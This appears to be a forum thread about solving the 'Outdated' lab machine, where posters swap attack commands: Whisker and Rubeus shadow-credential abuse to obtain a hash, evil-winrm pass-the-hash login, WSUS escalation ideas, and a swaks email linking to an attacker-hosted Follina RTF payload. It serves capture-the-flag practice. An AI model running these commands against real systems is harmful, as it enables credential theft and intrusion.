Return to forum

Himitsu · August 15, 2022 at 10:35 AM

(August 15, 2022, 09:48 AM)delmerherberth Wrote: I believe the intended path from sflowers to administrator is via wsus. Was anyone able to get root that way or am I down a rabbit hole?

Correct way.

meowmeowattack · August 15, 2022 at 10:44 AM

the way i got user is via shadow credentials* https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials* download the pre-compiled binaries here: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries[quote]> Whisker.exe add /target:sflowers> Rubeus.exe asktgt /user:sflowers /certificate: /password:"generated-pass" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show> evil-winrm -i 10.129.166.87 -u sflowers -H [/quote]stuck on root part, i believe this has to do with wsus, but none of the ways on https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus work yet. anyone able to compile https://github.com/GoSecure/wsuspicious?

0xhellfire · August 15, 2022 at 11:12 AM

follina is not working not getting any response back

m0m0n0suk3 · August 15, 2022 at 11:18 AM

(August 13, 2022, 09:02 PM)yumi Wrote:

it's folina

ousmane · August 15, 2022 at 11:18 AM

tyyyyyy

delmerherberth · August 15, 2022 at 11:36 AM

(August 15, 2022, 10:44 AM)meowmeowattack Wrote: the way i got user is via shadow credentials
* https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
* download the pre-compiled binaries here: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries

> Whisker.exe add /target:sflowers
> Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:"generated-pass" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
> evil-winrm -i 10.129.166.87 -u sflowers -H <ntlm-hash>

stuck on root part, i believe this has to do with wsus, but none of the ways on https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus work yet. anyone able to compile https://github.com/GoSecure/wsuspicious?

I was able to compile it but it still doesnt work for me

0xhellfire · August 15, 2022 at 12:05 PM

(August 15, 2022, 11:36 AM)delmerherberth Wrote:
(August 15, 2022, 10:44 AM)meowmeowattack Wrote: the way i got user is via shadow credentials
* https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
* download the pre-compiled binaries here: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries

> Whisker.exe add /target:sflowers
> Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:"generated-pass" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
> evil-winrm -i 10.129.166.87 -u sflowers -H <ntlm-hash>

stuck on root part, i believe this has to do with wsus, but none of the ways on https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus work yet. anyone able to compile https://github.com/GoSecure/wsuspicious?

I was able to compile it but it still doesnt work for me

share steps of SMTP follina
if you know cuz it's not working here

nimbus · August 15, 2022 at 1:34 PM

(August 13, 2022, 09:02 PM)yumi Wrote: .

kumar576 · August 15, 2022 at 2:55 PM

(August 13, 2022, 09:02 PM)yumi Wrote:

ty

Atelier · August 15, 2022 at 4:13 PM

I tried
swaks --to [email protected] --from [email protected] --server mail.outdated.htb --body "http://10.XX.XX.XX/test.rtf"
the machine will get .rtf file but the rtf payload will not work. I have try rtf payload on any.run, it is work on any.run

change rtf to doc or docx, the machine will not call back :angel: